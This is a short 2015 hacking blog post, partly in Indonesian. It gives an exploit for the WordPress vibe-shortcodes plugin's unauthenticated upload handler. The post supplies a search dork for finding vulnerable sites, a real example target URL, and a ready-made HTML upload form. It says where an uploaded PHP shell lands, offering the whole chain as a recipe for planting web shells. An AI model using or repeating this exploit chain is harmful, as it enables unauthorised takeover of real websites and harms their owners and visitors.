25 July 2015
Author : Rumput
Dork :/wp-content/plugins/vibe-shortcodes/ ( Use Brain )
Exploit : http://www.yaaka.cc/wp-content/plugins/vibe-shortcodes/upload_handler.php
Vuln : {"error":"No files were uploaded."}
Csrf :
<form enctype="multipart/form-data"
action="http://oni.chan/wp-content/plugins/vibe-shortcodes/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell :wp-content/uploads/years/month/shell.php Atau Bisa Dilihat Sendiri Nanti Muncul Dir Dan Nama Shellnya
Tag :
Hacking
Subscribe to:
Post Comments (Atom)
0 comments